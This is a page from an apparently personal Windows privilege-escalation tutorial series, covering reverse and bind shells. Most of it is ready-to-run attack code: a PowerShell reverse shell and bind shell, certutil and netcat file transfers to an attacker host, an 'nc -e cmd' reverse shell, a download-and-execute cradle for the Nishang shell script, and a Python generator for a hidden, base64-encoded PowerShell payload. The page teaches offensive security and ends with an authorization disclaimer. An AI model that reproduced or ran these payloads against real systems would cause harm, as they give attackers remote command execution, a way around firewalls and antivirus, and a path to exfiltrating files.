HomeGitHubPortfolioTwitter/XMediumCont@ct

3 - Reverse Shells in Windows

Topics

  1. Introduction to the Windows Shells

  2. Windows Permissions

  3. Reverse Shells in Windows

  4. SeImpersonatePrivilege Exploitation

  5. On Cross Compilation

  6. Windows Services

  7. Weak Service Permissions

  8. Unquoted Service Path

  9. DLL Hijacking

  10. Always Install Elevated

  11. Files with Sensitive Data

  12. Windows Hashes

  13. Stored Credentials and the Windows Vault

  14. Scheduled Task

  15. Critical Registry Paths

  16. Useful Tools

  17. AMSI Bypass

What is a Shell?

A shell is an interface that allows users to execute commands on an operating system. In the context of security and exploitation, a shell refers to a command-line interface provided to an attacker, enabling them to execute commands on a compromised machine.

Bind and Reverse Shells

Reverse Shells

A reverse shell involves the target machine initiating a connection back to the attacker's system. The attacker then uses this connection to execute commands on the target machine.

How It Works

  1. The attacker sets up a listener on their machine to wait for incoming connections.

  2. The target machine executes a payload that connects back to the attacker’s listener.

  3. Once the connection is established, the attacker gains shell access to the target system.

Example on Windows

Using PowerShell to create a reverse shell:

$client = New-Object System.Net.Sockets.TCPClient("attacker_ip", 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2  = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Advantages of Reverse Shells

  • Firewall Evasion: Since the target initiates the connection, it often bypasses restrictive inbound firewall rules.

  • Ease of Use: Simplifies access when the attacker has a dynamic or NATed IP.

Bind Shells

A bind shell involves the target machine listening for an incoming connection from the attacker. The attacker then connects to the target machine to gain shell access.

How It Works

  1. The target machine executes a payload that binds a shell to a specific port.

  2. The attacker connects to this port using a client (e.g., netcat).

  3. Once connected, the attacker can execute commands on the target machine.

Example on Windows

Using PowerShell to create a bind shell:

$listener = [System.Net.Sockets.TcpListener]4444
$listener.Start()
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = ([text.encoding]::ASCII).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$listener.Stop()

Drawbacks of Bind Shells

  • Firewall Restrictions: Most firewalls block inbound connections to unexpected ports.

  • Network Exposure: Requires the attacker to know the target's IP and accessible port.

Why Reverse Shells Are Preferred

  • Firewall Evasion: Since reverse shells initiate outbound connections, they are more likely to bypass firewalls.

  • Dynamic Networks: The attacker can operate from behind NAT or a dynamic IP without needing direct access to the target's network.

  • Stealth: Outbound connections are less suspicious and harder to trace compared to open inbound ports.

File Transfer in Windows

File transfer is often necessary for exploitation, privilege escalation, or data exfiltration. Several methods can be used to transfer files on Windows systems.

if windows defender is active on the machine, the usage of certutil for the downloading of file can trigger an antivirus warning, disabling the download of the file, or utilize techniques for evading it.

Native Methods

  1. Using certutil Certutil is a Windows tool that can download files:

    certutil -urlcache -split -f http://attacker_ip/file.exe file.exe

  2. Using PowerShell PowerShell (iwr) can download files via HTTP:

    Invoke-WebRequest -Uri http://attacker_ip/file.exe -OutFile file.exe

  3. Using FTP Windows supports FTP commands:

    ftp
open <attacker_ip>
put file.txt
get file.txt

  4. Using SMB Shares Files can be transferred using network shares:

    net use \\<attacker_ip>\share /user:username password
copy file.exe \\<attacker_ip>\share

Third-Party Tools

  1. Netcat Set up a listener on the attacker machine:

    nc -lvp 4444 > file.exe

    Send the file from the target:

    nc attacker_ip 4444 < file.exe

  2. Python Simple HTTP Server On the attacker machine:

    python3 -m http.server 80

    On the target machine:

    certutil -urlcache -split -f http://attacker_ip/file.exe file.exe

Spawning a Reverse Shell

cmd.exe

The cmd.exe reverse shell relies on utilities like ncat.exe to establish a connection. The process involves downloading the necessary binary, setting up a listener on the attacker machine, and initiating the reverse connection from the victim machine.

Steps

  1. Download ncat.exe on the Target Machine ncat.exe (a lightweight implementation of Netcat) is required for creating the reverse shell.

    iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -OutFile nc64.exe

  2. Set Up a Listener on the Attacker Machine The attacker machine must have a listener ready to receive the reverse connection.

    nc -lvnp 7777

  3. Initiate the Reverse Shell from the Target Machine On the victim machine, execute the following command to connect back to the attacker and spawn a shell:

    C:\Users\Quickemu\Desktop\nc64.exe 192.168.122.1 7777 -e cmd

Powershell

Using Invoke-PowerShellTcp.ps1 Script

Invoke-PowerShellTcp.ps1 is a PowerShell script designed for reverse shells.

  1. Download the Script on the Attacker Machine

    wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

  2. Configure the Script Add the line to specify the attacker's IP and port:

    echo "Invoke-PowerShellTcp -Reverse -IPAddress 192.168.122.1 -Port 7777" >> Invoke-PowerShellTcp.ps1

  3. Host the Script on an HTTP Server Use Python to serve the script for download:

    python3 -m http.server 1337

  4. Start listening mode with Netcat on attacker machine

netcat -nvlp 7777

  1. Execute the Script from the Target Machine

  • From CMD:

    powershell -c "iex(new-object net.webclient).downloadstring(\"http://192.168.122.1:1337/Invoke-PowerShellTcp.ps1\")"

  • From PowerShell:

    iex(new-object net.webclient).downloadstring("http://192.168.122.1:1337/Invoke-PowerShellTcp.ps1")

Using a Base64-Encoded Payload

An alternative method involves encoding a reverse shell script in Base64 and executing it directly.

  1. Generate the Payload Using Python Use the following Python script to create a Base64-encoded reverse shell payload:

    import base64

IP = "192.168.122.1"
PORT = 7777

def gen_payload(ip, port):
    payload = f"$client = New-Object System.Net.Sockets.TCPClient('{ip}', {port});"
    payload += "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};"
    payload += "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){"
    payload += "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
    payload += "$sendback = (iex $data 2>&1 | Out-String );"
    payload += "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
    payload += "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
    payload += "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"
    payload += ";$client.Close()"
    return "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(gen_payload(IP, PORT))

  2. Execute the Payload on the Target Machine Copy the generated Base64 string and execute it directly in PowerShell:

    powershell -nop -w hidden -e <Base64-Payload>

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!

Previous2 - Windows PermissionsNext4 - SeImpersonatePrivilege Exploitation

Last updated